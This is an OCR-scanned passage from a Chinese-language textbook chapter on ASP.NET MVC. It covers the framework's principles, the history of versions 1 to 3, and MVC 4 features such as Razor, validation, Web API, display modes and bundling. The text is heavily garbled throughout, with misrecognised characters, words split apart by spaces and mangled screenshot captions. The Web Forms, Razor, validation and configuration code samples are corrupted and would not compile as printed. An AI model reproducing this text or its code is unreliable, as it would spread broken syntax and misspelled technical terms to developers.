行 在 NET 平 台 上 的 强大 Web 开发 框架 ， 上 下 文 则 是 其 强大 原因 的 一 部 分 。 

ASPNET MVC 依赖 的 许多 核心 策略 ， 与 其 他 MVC 平台 所 使 用 的 策略 相 
同 ， 再 加 上 它 提供 的 编译 和 托管 代码 的 好 处 ， 以 及 利用 NET 语言 的 新 特性 ， 
比如 lambda 表达 式 、 动 态 和 匿名 类 型 ， 使 其 成 为 强大 的 开发 框架 。 不 过 ， 本 
质 上 , ASPNET 采用 了 大 部 分 基于 MVC 的 Web 框架 所 使 用 的 一 些 基本 原则 : 

e 约定 优 于 配置 (convention over configuration) 

e 不 重复 (又 名 DRY 原则 ) 

e@ 尽量 保持 可 插 拔 性 (pluggability) 

@ 尽量 为 开发 人 员 提 供 帮 助 ， 但 必要 时 允许 开发 人 员 自 由 发 挥 


1.1.4 ASPNET MVC 4 的 发 展 历程 


目 2009 年 3 月 ASPNET MVC 1 发 布 起 ， 在 短 短 三 年 的 时 间 里 ，ASPNET MVC 已 
经 发 布 了 4 个 主要 版 本 ， 期 间 还 有 一 些 临时 版 本 。 为 更 好 地 理解 ASPNET MVC 4， 首 先知 
道 ASPNET MVC 的 发 展 历程 是 很 重要 的 。 本 市 主要 描述 3 个 ASPNET MVC 版 本 的 内 容 
1. ASP.NET MVC 1 概述 


2007 年 2 月 ，Microsoft 公司 的 Scott Guthrie(“ScottGu”) 飞 往 美国 东海 岸 参 加 会 议 。 在 
旅途 中 ， 他 草拟 编写 了 ASPNET MVC 的 内 核 程序 。 这 是 一 个 只 有 几 百 行 代码 的 简单 应 用 程 
序 ， 但 它 却 给 大 部 分 追随 Microsoft 公司 的 Web 开发 人 员 带 来 了 美好 前 景 。 
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据说 , 2007 年 10 月 , 在 华盛顿 州 雷 德 蒙 市 举行 的 Austin ALT.NET 会 议 上 , ScottGu 告 
诉 一 些 开 发 者 说 “我 在 飞机 上 写 了 这 个 好 东西 ”并 询问 他 们 是 否 看 到 需求 以 及 对 该 应 用 程 
序 的 看 法 。 此 举 一 炮 打 啊 。 事 实 上 ， 许 多 人 都 参与 了 该 应 用 程序 原型 的 设计 ， 并 把 代码 命 
名 为 Scalene。Eilon Lipton 于 2007 年 9 月 把 第 一 份 原型 电邮 给 他 的 团队 ， 并 和 ScottGnu 在 
原型 、 代 码 、 想 法 上 多 次 思考 ， 反 复 其 酌 。 

即使 在 官方 发 布 之 前 ，ASPNET MVC 也 并 不 符合 Microsoft 产品 的 标准 ， 这 一 点 是 很 
清楚 的 。ASPNET MVC 的 开发 周期 是 高 度 交 互 的 ， 在 官方 版 本 发 布 之 前 已 有 9 个 预览 版 
本 ， 它 们 都 进行 了 单元 测试 ， 并 在 开源 许可 下 发 布 了 代码 。 所 有 这 些 都 突出 了 一 个 哲理 : 在 
整个 研发 过 程 中 要 高 度 重 视 团 队 的 协作 交互 。 最 终结 果 是 在 ASPNET MVC 1 的 官方 版 本 发 
布 时 (包含 代码 和 单元 测试 ), 已 经 被 那些 将 一 直 使 用 它 的 开发 者 多 次 使 用 和 审 碍 。ASPNET 
MVC 1 于 2009 年 3 月 13 日 正式 发 布 。 


2. ASP.NET MVC 2 概述 


与 ASPNET MVC 1 发 布 时 隔 一 年 ，ASPNET MVC 2 于 2010 年 3 月 发 布 。ASPNET 
MVC 2 的 部 分 主要 特点 如 下 : 

e 市 有 目 定 义 模板 的 UI 辅助 程序 

e 在 客户 闫 和 服务 器 端 基于 特性 的 模型 验证 

e 强 类 型 HTML 辅助 程序 

e 改善 的 Visual Studio 开发 工具 

根据 应 用 ASPNET MVC 1 开发 各 种 应 用 程序 的 开发 人 员 的 反馈 意见 , ASPNET MVC 2 
中 增强 了 许多 API 的 功能 以 增强 其 “ 杀 和 ”性 ， 比 如 : 

e 文 持 将 大 型 应 用 程序 划分 为 域 

e 文 持 异步 控制 右 

e 使 用 Html.RenderAction 文 持 演 染 网 页 或 网 站 的 某 一 部 分 

e 许多 新 的 辅助 函数 、 实 用 工具 和 API 增强 

ASPNET MVC 2 发 布 的 一 个 重要 先例 是 很 少 有 重大 改动 , 这 是 ASPNET MVC 结构 化 
设计 的 一 个 证 明 ， 这 样 就 可 以 实现 在 核心 不 变 的 情况 下 进行 大 量 的 扩展 。 

3. ASP.NET MVC 3 概述 


在 Web Matrix 发 布 的 推动 下 ，ASPNET MVC 3 于 ASPNET MVC 2 发 布 之 后 的 第 10 
个 月 推出 。ASPNET MVC 3 的 主要 特征 如 下 : 
e 文 持 Razor 视图 引擎 
e 文 持 .NET 4 数据 注解 
e 改进 了 模型 验证 
e 提供 更 强 的 控制 和 更 大 的 灵活 性 ， 支 持 依 赖 项 解析 (Dependency Resolution) 和 全 局 
操作 过 小 疾 (Global Action Filters) 
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e 丰富 的 JavaScript 支持 ， 其 中 包括 非 侵 入 式 JavaScript、jQuery 验证 和 JSON 绑 定 

e 文 持 NuGet， 可 以 用 来 发 布 软件 ， 管 理 整 个 平台 的 依赖 

由 于 这 些 ASPNET MVC 3 的 特性 都 是 最 近 添 加 的 ,并且 非常 重要 ,因此 这 里 将 对 其 
做 详细 介绍 。 


注意 拥有 MVC 经 验 的 开发 人 员 非 常 关心 新 版 本 中 做 出 的 更 新 ， 这 里 的 
功能 总 结 就 是 为 这 些 人 准备 的 。 

如 果 以 前 没有 使 用 过 ASPNETMVC， 也 不 必 担 心 ， 这些 特性 目前 还 无 关 

紧要 ; 本 书 会 在 各 章节 中 详细 阐述 它们 。 这 里 建议 跳 过 这 些 内 容 , 后 面 再 回 过 


Razor 视图 引擎 

自 10 余年 前 ASPNET 1.0 发 布 以 来 ，Razor 是 在 泻 染 HTML 方面 的 第 一 个 重大 更 新 。 
在 ASPNETMVC 1 和 ASPNET MVC 2 中 默认 使 用 的 视图 引擎 普 过 称 为 Web Forms 视图 引 
擎 (Web Forms View Engine)， 因 为 它 和 Web Forms 使 用 了 同样 的 ASPX/ASCX/MASTER 文 
件 和 语法 。 但 是 它 的 设计 目标 是 文 持 在 图 形 编辑 器 中 的 编辑 控件 。 下 面 是 在 Web Forms 
页 面 中 这 种 语法 的 一 个 示例 : 


<$%f Page Language="C#" MasterPageFile="</Views/Shared/site.Master" 

Inherits="System.Web.Mvc.ViewPage<MvcMusicStore.ViewModels.StoreBrowse— 
ViewModel>"™ 

各 > 


<asp:Content ID="Contentl™” ContentPlaceHolderID="TitleContent™” runat="server"> 
Browse Albums 
</asp:Content> 


<asp:Content ID="Content2" ContentPlaceHolderID="MainContent™” runat="server"> 


<div class="genre"> 
<h3><em><$: Model.Genre.Name $%></em> Albums</h3> 
<ul id="album-list"> 
< foreach (Var album in Model.Albums) { > 


<1i> 
<ahref="<$®: Url.Action("Details", new { id = album.Albumld }) >"> 
<img alt="<$: album.Title $>" src="<$%: album.AlbumArtUr] $%>" /> 
<span><$: album.Title $$></span> 
</a> 
</1i> 


< 告 上 省 > 
</ul> 
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</asp:Content> 

Razor 被 专门 设计 成 视图 引擎 的 语法 。 它 有 一 个 主要 的 作用 : 集中 生成 HTML 代码 模 
板 。 下 面 展示 如 何 应 用 Razor 生成 同样 的 标记 : 

QQmodel MvcMusicstore.Models.Genre 


@{ViewBag.Title = "Browse Albums";} 


<div class="genre"> 
<h3><em>liModel .Name</em> Albums</h3> 


<Ul id="album— 1ist"> 
Mforeach (var album in Model .Albums) 


{ 
<1i> 
<a href="QUrl1l .Action ("Details", new { id = album.AlbumlId })"> 
<img alt="@album.Title™" src="@album.AlbumArtUrl™" /> 
<span>lalbum.Title</span> 
</ay 
</l1i> 
} 
</ul> 
</div> 


Razor 语法 易于 输入 、 易 于 阅读 。Razor 不 像 Web Forms 视图 引擎 那样 具有 类 似 于 XML 
的 繁杂 语法 规则 。 
前 和 面 已 经 讨论 了 使 用 Razor 语法 的 不 同感 受 。 为 了 用 较为 量化 的 用 语 表 达 ， 下 向 讨论 
Razor 语法 的 设计 目标 : 
e 简洁 、 富 有 表现 力 和 灵活 性 : Razor 在 “HTML 标记 生成 模板 ”方面 具有 非常 简洁 
的 语法 。 这 不 仅 可 以 最 大 限度 地 减少 按键 次 数 一 一 这 是 一 个 明显 的 结果 而 且 可 
以 容易 地 表达 意图 。 一 个 重要 的 例子 是 标记 和 代码 之 间 过 渡 的 简洁 性 。 在 循环 中 写 


- 些 模型 属性 时 可 以 发 现 这 一 点 。 
aforeach (var album in Model.Albums) 
{ 
<11> 
<a href="Q@Url.Action("Details", new { id = album.AlbumId })"> 
<img alt="Q@album.Title" src="@album.AlbumArtUrl1l™" /> 
<span>lalbum.Title</span> 
</a> 
</l1i> 
} 


第 1 章 入 门 


e 不 是 新 语言 : Razor 语法 非常 直观 地 支持 现 有 的 .NET 编码 技术 。Scott Hanselman 在 
谈 及 他 学 习 Razor 的 经 验 时 ， 很 好 地 总 结 了 这 一 亮点 : 


我 一 直 在 苦 基 寻找 Razor 的 语法 规则 ， 直 到 有 人 告诉 我 不 要 再 想 了 ,直接 输入 “@” 
符号 就 可 以 开始 编写 代码 了 ， 我 才 意识 到 原 米 Razor 本 无 规则 。 
—— Hanselminutes #249: On WebMatrix with Rob Conery 
http://hanselminutes.cony default.aspx?showid=268 


e 容易 学 习 : 由 于 Razor 不 是 一 门 新 的 编程 语言 ， 因 此 学 习 Razor 非 音 容易。 如 果 熟 
悉 HIML 语言 和 .NET 技 术 ; 那 么 当 需 要 编写 NET 代 码 时 ,输入 @ 符 与 后 输入 HIML 
代码 就 可 以 了 。 

e。 支持 所 有 文本 编辑 器 : 由 于 Razor 是 量 级 轻 并 注重 于 HIML 的 语言 ， 因 此 可 自由 地 
选择 编辑 器 。 虽 然 Visual Studio 的 语法 关键 词 高 党 显示 和 智能 感知 (mtelliSense) 功 能 
非常 棒 ， 但 Razor a 可 使 用 任何 文本 编辑 器 进行 编辑 。 

e 强大 的 智能 感知 功能 : 尽管 Razor 可 以 不 使 用 智能 感知 功能 进行 工作 ， 但 是 智能 感 
知 功能 对 于 查看 oak 如 ， 香 看 模型 对 象 支 持 的 属性 ) 还 是 很 方便 的 。 因 此 ， 
Razor 在 Visual Studio 中 提供 了 强大 的 智能 感知 功能 ， 如 图 1-1 所 示 。 


> 


Ee LabelFor(m => m.pl) 


ml .PasswordFor(m => £ confimpassword SWord) 


/1i> qs 
/ol> GetHasht ode 
<input type="submit"” value=" ES - ed 
</fieldset> 人 
ostring 
PF UserName 
图 1-1 
上 述 内 容 对 Razor 向 化 视图 编程 的 原因 进行 了 简要 介绍 。 第 3 章 将 对 此 进行 详细 介绍 。 


验证 的 改善 

验证 是 构建 Web 应 用 程序 的 一 个 重要 组 成 部 分 ,但 是 它 从 来 不 是 一 项 有 趣 的 工作 。 在 
确保 验证 正确 的 情况 下 ， 一 般 总 是 希望 用 尽 可 能 少 的 时 间 编 写 验 证 代码 。 

ASPNET MVC 2 的 特性 驱动 验证 系统 通过 使 用 声明 式 代 码 替代 原来 重复 的 命令 式 代 
人 码 ， 减 少 了 这 一 过 程 中 的 很 多 麻烦 。 然 而 ， 这 只 支持 少数 的 高 级 验证 方案 。 因 此 在 大 多 数 
情况 下 仍 不 得 不 编写 大 量 代 码 。ASPNET MVC 3 将 验证 系统 扩展 到 支持 可 能 遇见 的 大 部 分 
情况 。 如 果 想 更 详细 地 了 解 ASPNET MVC 的 验证 系统 ， 请 参阅 第 6 章 。 


支持 .NET 4 数据 注解 

因为 ASPNET MVC 2 编译 不 兼容 .NET 3.5 框架 ， 所 以 它 不 文 持 任 何 .NET 4 框架 数据 
注解 增强 的 功能 。 由 于 .NET 4 框架 的 支持 ，ASPNET MVC 3 采用 了 一 些 新 的 且 非 常 有 用 
的 验证 功能 。 下 面 是 一 些 例子 : 
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e 尺 管 在 .NET 4 框架 标准 中 System.ComponentModel.DataAnnotations 的 Display 特性 
可 以 本 地 化 ， 但 是 ASP.NET MVC 2 的 DisplayName 特性 是 无 法 本 地 化 的 。 

e .NET 4 框架 增强 了 ValidationAttribute 特性 ， 以 便 更 好 地 与 整个 模型 验证 上 下 文 协 
同 工 作 ， 这 极 大 地 和 便 化 了 一 些 操 作 ， 比 如 验证 器 ， 它 比较 或 以 其 他 方式 引用 两 个 模 


ASPNET MVC 3 对 .NET 4 框架 中 IValidatableObject 接口 的 支持 值得 赏识 。 这 样 就 可 
以 通过 在 模型 类 中 实现 这 个 接口 以 及 相应 的 Validate 方法 ， 以 任何 想象 到 的 方式 扩展 模型 
验证 ， 示 例 代 码 如 下 : 
public class VerifiedMessage : IValidatableobject | 
public string Message 1{ get; set; } 


public string AgentKey { get; set; } 
public string Hash { get set; } 


public IEnumerable<ValidationResult> Validate! 
ValidationContext wvalidationContext) 1 
if (SecurityService.ComputeHash (Message, AgentFRKey) |'= Hash) 
yield return new ValidationResult ("Agent compromised"™); 


} 


非 侵 入 式 JavaScript 

非 侵入 式 JavaScript 是 一 般 术 语 ， 它 表达 了 一 个 哲理 ， 类 似 于 术语 “表述 性 的 状态 转 
移 (Representational State Transfer，REST)”。 直 观 描述 束 是 非 侵 入 式 JavaScript 不 在 页 面 标 
记 中 混杂 JavaScript 代码 。 例 如 , 非 侵入 式 JavaScript 链接 页 面 元 素 是 通过 元 素 的 ID 或 类 ， 
这 些 类 通常 基于 其 他 特性 的 呈现 (例如 HIMLS 的 data- 特 性 )， 而 不 是 通过 事件 特性 (例如 
onclick 和 onsubmit)。 

当 把 HTML 文档 只 看 成 一 个 文档 时 ， 非 侵入 式 JavaScript 具有 很 大 的 意义 。 文 档 应 该 

有 语义 意义 ， 所 有 这 些 ( 像 标签 结构 和 元 素 特 性 等 ) 应 该 有 一 个 精确 的 含义 。 为 了 促进 交互 
(即使 用 doPostBack) 而 让 JavaScript 遍布 整个 页 面 是 不 利于 文档 内 容 的 。 

ASPNET MVC 3 采用 两 种 方式 文 持 非 侵 入 式 JavaScript， 分 别 是 : 

e Ajax 辅助 类 (比如 Ajax.ActionLink 和 Ajax.BeginForm) 结 合 利用 扩展 的 特性 (data- 特 
性 ) 和 jQuery 技术 为 FORM 标签 提供 简洁 的 标记 。 

e Ajax 验证 不 再 将 验证 规则 以 一 块 JSON 数据 (JSON 数据 有 时 很 大 ) 发 出 ， 而 是 应 用 
data- 特 性 发 出 。 尽 管 从 技术 上 考虑 ASP.NET MVC 2 的 验证 系统 相当 不 侵入 ， 但 是 
ASPNET MVC 3 系统 更 加 不 侵入 一 一 标记 更 加 轻 量 化 ，data- 特 性 的 使 用 使 得 应 用 
jQuery 和 其 他 JavaScript 库 验 证 信息 的 利用 和 重用 更 加 简单 。 


jQuery 验证 
ASPNET MVC 2 支持 jQuery， 而 使 用 Microsoft Ajax 进行 验证 。ASPNET MVC 3 通过 
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将 验证 文 持 转换 到 流行 的 jQuery 验证 插件 上 运行 ,完成 了 为 Ajax 文 持 使 用 jQuery 的 过 渡 。 
非 侵 入 式 JavaScript( 前 和 面 讨论 过 ) 和 使 用 标准 插件 系统 的 jQuery 验证 的 结合 使 得 验证 极其 灵 
活 ， 同 时 还 可 从 强大 的 jQuery 社区 中 获得 益处 。 

目前 在 ASPNET MVC 3 项 目 中 ， 客 户 端 验 证 默认 是 打开 的 ， 并 且 可 以 通过 使 用 
web.config 设置 或 在 global.asax 中 编码 (以 备 项 目 升 级 ) 使 其 在 整个 站 点 中 启用 。 


JSON 绑 定 

ASPNET MVC 3 通过 新 的 JsonValueProviderFactory 支持 JSON(JavaScript Object Notation) 
绑 定 ， 这 样 可 以 使 您 的 操作 方法 接受 和 绑 定 (model-bind)JSON 格式 的 数据 。 这 一 点 在 高 级 
的 Ajax 应 用 ( 像 客户 端 模板 和 需要 将 数据 传 回 服务 器 的 数据 绑 定 ) 中 非常 有 用 。 


依赖 项 解析 

ASPNET MVC 3 引入 了 一 个 全 新 概念 ， 称 为 依赖 解析 絮 (dependency resolver)， 从 而 大 
大 简化 了 在 应 用 程序 中 依赖 注入 的 使 用 。 这 使 得 分 离 应 用 程序 组 件 更 加 容易 ， 从 而 使 组 件 
更 容易 配置 和 测试 。 

下 面 列举 的 方案 已 经 添加 了 对 依赖 解析 器 的 文 持 : 

e 控制 需 ( 注 册 和 注入 控制 项 工厂 ， 注 入 控制 礁 ) 

e 视图 (注册 和 注入 视图 引擎 ， 向 视图 页 面 注 入 依赖 关系 ) 

e 操作 过 滤 右 (定位 和 注入 过 小 右 ) 

e 模型 绑 定 器 (注册 和 注入 ) 

e 模型 验证 提供 器 (注册 和 注入 ) 

e 模型 元 数据 提供 器 (注册 和 注入 ) 

e 值 提 供 器 (注册 和 注入 ) 

这 是 一 个 宽泛 的 话题 ， 将 在 第 12 章 中 对 其 进行 专门 讲解 。 


全 局 操作 过 滤器 

ASPNET MVC 2 的 操作 过 滤器 可 以 提供 一 段 执 行 代码 的 钧 子 hook)， 使 得 该 段 代码 可 
以 在 一 个 操作 方法 执行 之 前 或 之 后 运行 。 这 个 功能 可 以 通过 上 自 定 义 特性 实现 ， 目 定义 的 特 
性 可 以 应 用 于 控制 器 的 一 些 操作 或 者 整个 控制 器 。 ASPNET MVC 2 就 带 有 一 些 过 滤器 , 像 
Authorize 特性 。 

ASPNET MVC 3 运用 适用 于 程序 中 所 有 操作 方法 的 全 局 操作 过 滤器 扩展 了 这 一 功能 ， 
这 对 于 处 理应 用 程序 基础 结构 问题 ， 像 错误 处 理 和 日 志 记录 尤其 有 用 。 
1.1.5 ASPNET MVC 4 概述 

ASPNET MVC 4 建立 在 一 个 相当 成 熟 的 基础 上 , 能 够 把 重点 放 在 一 些 高 级 应 用 上 。 它 
的 主要 功能 包括 : 

e ASPNET Web API 

e 增强 了 默认 的 项 目 模板 
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添加 使 用 jQuery Mobile 的 手机 项 目 模板 
文 持 显示 模式 (Display Modes) 

支持 异步 控制 器 的 任务 

捆绑 和 微小 (minification) 


下 面 章节 对 这 些 功能 进行 简要 介绍 。 全 书 会 对 它们 进行 深入 剖析 讲解 。 


1.1.6 ASPNET Web API 


设计 ASPNET MVC 的 日 的 是 用 来 创建 网 站 ， 因 此 ， 整 个 平台 的 设计 日 标 很 明确 : 啊 


应 浏览 器 的 请 求 ， 并 返回 HTML。 

然而 ,，ASPNET MVC 使 得 控制 到 字 节 的 啊 应 变 得 非常 容易 ,而且 MVC 模式 在 创建 服 
务 层 时 非常 有 用 。ASPNET 开发 人 员 发 现 ， 使 用 MVC 可 以 创建 Web 服务 ， 这 些 服务 可 以 
返回 XML、JSON 或 其 他 非 HTML 格式 的 数据 ， 并 且 比 使 用 其 他 服务 框架 (比如 Windows 
Communication Foundation(WCF) 或 编写 原始 的 HITP 处 理 程序 ) 更 容易 。 尽 管 如 此 , 它 仍 存 
在 有 一 些 不 足 之 处 ， 比 如 我 们 需要 使 用 网 站 框架 来 传送 服务 。 但 总 体 而 言 ，MVC 要 优 于 
其 他 框架 。 

ASPNET MVC 4 引入 了 一 个 好 的 解决 方案 : ASPNET Web API( 简 称 Web APD。 它 是 

个 提供 了 ASPNET MVC 开发 风格 的 框架 ， 但 它 专门 用 来 编写 HTTP 服务 。 该 框架 包括 

在 HITP 服务 域 修改 一 些 ASPNET MVC 概念 ， 并 提供 一 些 新 的 面向 服务 的 功能 。 


下 面 是 一 些 类 似 MVC 的 Web API 功能 ， 它 们 只 适用 于 HTTP 服务 域 : 
e 路 由 ASPNET Web API 使 用 同样 的 路 由 系统 ， 将 URL 映射 到 控制 器 操作 。 它 按 


照 约定 将 HITP 动词 映射 到 操作 ， 从 而 实现 将 路 由 融入 HITP 服务 上 下 文 ， 这 样 既 
可 以 使 代码 更 加 易于 阅读 ， 同 时 也 鼓励 了 RESTful 服务 设计 。 

模型 绑 定 和 验证 和 MVC 简化 映射 输入 值 (表单 域 、cookies、URL 参数 等 ) 到 模型 
值 的 过 程 一 样 ，Web API 自动 把 HTTP 请 求 值 映射 到 模型 。 绑 定 系统 具有 和 良好 的 扩 
展 性 ， 并 且 和 我 们 在 MVC 模型 绑 定 中 一 样 ， 它 也 包括 基于 特性 的 验证 。 

过 滤器 : MVC 使 用 过 滤器 (第 15 章 中 介绍 ) 以 便 通 过 特性 向 操作 添加 行为 。 例 如 ， 
回 某 个 MVC 操作 添加 [Authorize] 特 性 将 会 阻止 用 户 的 匿名 访问 。 当 用 户 匿 名 访问 
时 ， 页 面 就 会 自动 重 定向 到 登录 页 面 。Web API 也 支持 一 些 标准 的 MVC 过 滤器 ， 
比如 一 个 服务 优化 的 [Authorize] 特 性 。 此 外 ， 也 可 以 根据 需要 自 定义 过 滤器 。 

基 架 : 可 使 用 和 添加 MVC 控制 器 (可 参阅 本 章 后 面部 分 ) 一 样 的 对 话 框 来 添加 新 的 
Web API 控制 器 。 也 可 以 选用 Add Controller 对 话 框 来 快速 地 搭建 一 个 基于 实体 框 
加 模型 类 型 的 Web API 控制 器 。 

简易 的 单元 测试 : 这 一 点 和 MVC 很 像 ，Web API 建立 在 依赖 注入 和 避免 全 局 状态 
使 用 的 概念 之 上 。 


除 此 之 外 ，Web API 专门 为 HITP 服务 的 开发 ， 还 添加 了 一 些 新 的 概念 和 功能 : 
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e HTTP 编程 模型 : 为 了 更 好 地 处 理 HTTP 请 求 和 响应 , Web API 开发 经 验 得 到 优化 。 
提供 了 一 个 强 类 型 的 HITP 对 象 模型 、HTTP 状态 码 和 容易 访问 的 headers 等 。 
e 基于 HTTP 动词 的 动作 调度 : MVC 根据 操作 方法 的 名 称 来 调度 ， 而 Web API 则 根 
据 HITP 动词 目 动 调度 操作 方法 。 例 如 ， 一 个 GET 请 求 会 被 目 动 调度 到 一 个 名 为 
GetItem 的 控制 器 操作 。 
e 内 容 协 商 : HITP 已 经 长 期 文 持 内 容 协 商 系统 , 在 这 些 系统 中 , 浏览 器 (和 其 他 HITP 
客户 端 ) 给 出 它们 响应 格式 优先 级 ， 服 务 器 用 它 支 持 的 首选 格式 做 出 响应 。 这 样 我 
们 的 控制 器 就 可 以 提供 XML、JSON 和 其 他 格式 (根据 需要 可 以 添加 自己 的 格式 ) 来 
啊 应 客户 端 最 想 要 的 格式 。 这 样 就 可 以 为 新 数据 格式 提供 支持 ， 而 不 需要 修改 控制 
器 的 代码 。 
e 基于 代码 的 配置 服务 配置 是 复杂 的 。WCF 采用 元 长 复杂 的 配置 文件 来 完成 配置 ， 
与 其 不 同 的 是 ，Web API 完全 通过 代码 配置 。 
虽然 ASPNET Web API 包含 在 ASPNETMVC 4 中 ， 但 它 可 以 单独 使 用 。 事 实 上 ， 它 
与 ASPNET 不 存在 任何 依赖 关系 , 并 且 可 以 自 托管 一 一 也 就 是 说 , 独立 于 ASPNET 和 IIS 。 
这 意味 看 Web API 可 以 运行 在 任何 .NET 应 用 程序 中 ， 可 以 是 一 个 Windows 服务 ， 甚 至 是 
一 个 简单 的 控制 台 应 用 程序 。 想 更 详细 地 学 习 ASPNET Web API， 请 参阅 第 11 章 。 


1.1.7 增强 的 默认 项 目 模 板 
直到 ASPNET MVC 3，ASPNET MVC 1 项 目 默 认 模 板 的 可 视 化 设计 基本 保持 不 变 。 


当 创 建 一 个 新 的 ASPNET MVC 项 目 ， 并 运行 它 时 ， 蓝 色 背 景 上 就 会 出 现 一 个 白色 方形 ， 
如 图 1-2 所 示 ( 蓝 色 不 能 在 黑白 印刷 的 书 中 显示 出 来 ， 但 是 应 该 知道 这 个 事实 )。 


区 SE hittp://localhost1583/ DP- ECX 疙 honerage x 
My MVC Application 


[ Log On ] 


Welcome to ASP.NET MVCI! 


To learn more about ASP.NET MYC visit http:/ /asp.net/myve. 


图 1-2 


在 ASPNET MVC 4 中 ， 默 认 模 板 的 HIML 和 CSS 都 进行 了 重新 设计 。 一 个 新 的 
ASPNET MVC 应 用 程序 如 图 1-3 所 示 。 
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到 S19 http://localhost.267359/ Pa r 量 Cx Xx | | Home page - My ASp,NET .. x hit 


Home About 


Home Page. Modify this template to jump-start your ASP.NET MVC 
application. 


We suggest the following: 


[1] Getting Started 
ASP.NET MVC gives You a powerful, patterns-based way to build dynamic websites that enables a clean separation of concerns and that 
gves YOU full control Over markup for enjoyable, agile development. ASP.NET MVC Includes many features that enable fast TDD-fnendly 
development for Creating sophisticated applications that use the latest web standards. Learn more.. 


Add NuGet packages and jump-start your coding 
NuGet makes it easy to install and update free libraries and tools. Leam more... 


Find Web Hosting 
You can easily find a web hosting company that offers the right mix of features and price for your applications. Leam more,, 


图 1-3 

除了 拥有 现代 的 设计 (或 许 有 人 会 提出 任何 可 能 的 设计 ) 之 外 ,新 模板 通过 目 适 应 布局 ， 
也 支持 移动 浏览 器 。 自 适应 布局 是 一 项 设计 流动 网 页 布局 的 技术 ， 它 会 通过 CSS 媒体 查询 
来 啊 应 不 同 的 屏幕 尺寸 。 当 低 于 850px 宽度 的 终端 设备 (如 手机 或 平板 电脑 ) 访 问 站 点 时 ， 
CSS 会 因为 小 表单 的 因素 ， 自 动 重新 配置 优化 ， 正 如 图 1-4 所 显示 的 移动 仿真 器 。 

尽管 网 站 值得 拥有 上 自 定义 的 设计 ， 但 是 使 用 现代 的 标记 和 CSS 设置 ASPNET MVC 4 
项 目 中 的 底层 HTML 和 CSS 是 非常 棒 的 ， 因 为 它们 能 够 很 好 地 响应 不 断 增长 的 移动 浏览 
器 的 使 用 率 。 
1.1.8 ”使 用 jQuery Mobile 的 移动 项 目 模板 

如 果 要 创建 只 有 移动 浏览 器 访问 的 网 站 , 可 利用 新 的 Mobile Project 模板 。 该 模板 可 以 
预先 配置 站 点 以 便 使 用 流行 的 jQuery Mobile 库 ， 该 库 不 但 能 够 很 好 地 适用 于 移动 设备 ， 而 
且 还 提供 了 美观 样式 ， 如 图 1-5 所 示 。jQuery Mobile 优化 了 触摸 功能 ， 文 持 Ajax 导航 和 移 
动 设备 的 功能 。 


第 1 章 入 门 


四 Lo in Homo Pagoe 


Modify this template to 
kick-start your ASP.NET 
MVC application. 


To laarn more aboul ASP NET MVC visil 


' 人 
上 天 下 


We suggest the following: 


白 iocalhost26759 


1.1.9 显示 模式 


显示 模式 根据 浏览 右 发 出 的 请 求 ， 使 用 基于 约定 的 方法 来 选择 不 同 的 视图 。 当 浏览 右 
的 用 户 代 理 指示 一 个 已 知 的 移动 设备 时 ， 默 认 的 视图 引擎 首先 查找 名 称 以 .Mobile.cshtml 
结尾 的 视图 。 例 如 ， 如 果 网 站 项 目 中 有 一 个 通用 视图 和 一 个 移动 视图 ， 它 们 的 名 称 分 别 是 
Index.cshtml 和 Index.Mobile.cshtml， 那 么 当 在 移动 浏览 句 网 站 访问 到 该 页 面 时 ，MVC 4 将 
目 动 使 用 移动 视图 。 

此 外 , 还 可 以 根据 目 定 义 标 准 , 注册 目 定 义 设备 模式 所 要 做 的 就 是 编写 一 行 代码 。 
例如 ， 现 在 要 注册 一 个 WinPhone 设备 模式 ， 用 名 称 以 .WinPhone.cshtml 结束 的 视图 啊 应 
Windows Phone 设备 ， 我 们 只 需要 在 Globalasax 文件 的 Application Start 方法 中 写 入 如 下 
代码 : 


DisplayModeProvider.Instance.Modes.Insert (0, new 
DefaultDisplayMode ("WinPhone") 


{ 
ContextCondition = (context 一 > 
context .GetOverriddenUserAgent () .IndexOt 
("Windows Phone OS", StringComparison.OrdinallgnoreCase) >= 0) 
}); 


1.1.10 ”捆绑 和 微小 框架 


ASPNET 4 支持 的 捆绑 和 微小 框架 与 ASPNET 4.5 中 包含 的 框架 相同 。 该 框架 通过 合 
并 脚本 引用 可 以 把 若干 个 请 求 合并 为 一 个 请 求 ， 从 而 减少 发 送 到 站 点 的 请 求 数量 。 与 此 同 
时 ， 它 也 采用 各 种 技术 来 压缩 请 求 大 小 ， 比 如 缩短 变量 名 、 删 除 空格 和 注释 等 。 它 也 很 好 
地 适用 于 CSS， 可 以 把 若干 CSS 请 求 打 包 成 一 个 请 求 ， 并 压缩 CSS 请 求 的 大 小 ， 使 其 用 
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最 少 的 字 节 ， 产 生 等 价 的 规则 ， 也 采用 高 级 技术 ( 像 语 义 分 析 ) 来 折 县 CSS 选择 器 。 

捆绑 系统 是 高 度 配置 的 ， 我 们 可 以 创建 包含 特定 脚本 的 目 定 义 捆 绑 ， 并 用 单一 的 URL 
来 引用 这 些 捆 绑 。 当 使 用 Internet 模板 创建 新 的 MVC 4 应 用 程序 时 ， 我 们 通过 引用 
/App_Start/BundleConfig.cs 中 列 出 的 默认 捆绑 ， 可 以 看 到 一 些 例 子 。 

使 用 捆绑 和 微小 系统 的 一 个 不 错 的 意外 收获 是 ， 我 们 可 从 视图 代码 中 删除 文件 引用 。 
这 样 我 们 就 可 以 在 不 升级 视图 或 布局 的 情况 下 ， 添 加 或 升级 脚本 库 和 那些 拥有 不 同文 件 名 
称 的 CSS 文件 ， 因 为 引用 的 是 脚本 或 CSS 绑 定 而 不 是 单独 文件 。 例 如 ，MVC Internet 应 用 
程序 模板 就 包含 一 个 不 依赖 于 版 本 号 的 jQuery 绑 定 。 


bundles.Add (new ScriptBundle("~/bundles/jquery") .Include!l 
"~/Scripts/jquery-{version} .js")); 


然后 在 站 点 布局 中 (_Layout.cshtml)， 通 过 绑 定 URL 来 引用 它 ， 代 码 如 下 : 


RSscripts.Render ("~/bundles/jquery") 


由 于 这 些 引用 不 用 绑 定 到 jQuery 版 本 号 ， 因 此 绑 定 和 微小 系统 将 目 动 获得 更 新 的 
jQuery 库 ( 通 过 NuGet 或 手动 )， 而 个 再 要 修改 任何 代 伍 。 


1.1.11 包含 开源 库 


长 久 以 来 ，MVC 项 目 模板 包含 顶级 的 开源 库 ， 例 如 jQuery 和 Modernizr。 目 MVC 3 
起 ， 这 些 库 通过 NuGet 包含 ， 这 使 得 库 的 更 新 和 依赖 管理 变 得 极其 简单 。 除 此 之 外 , MVC 4 
项 目 模 板 还 引入 了 一 些 新 库 : 
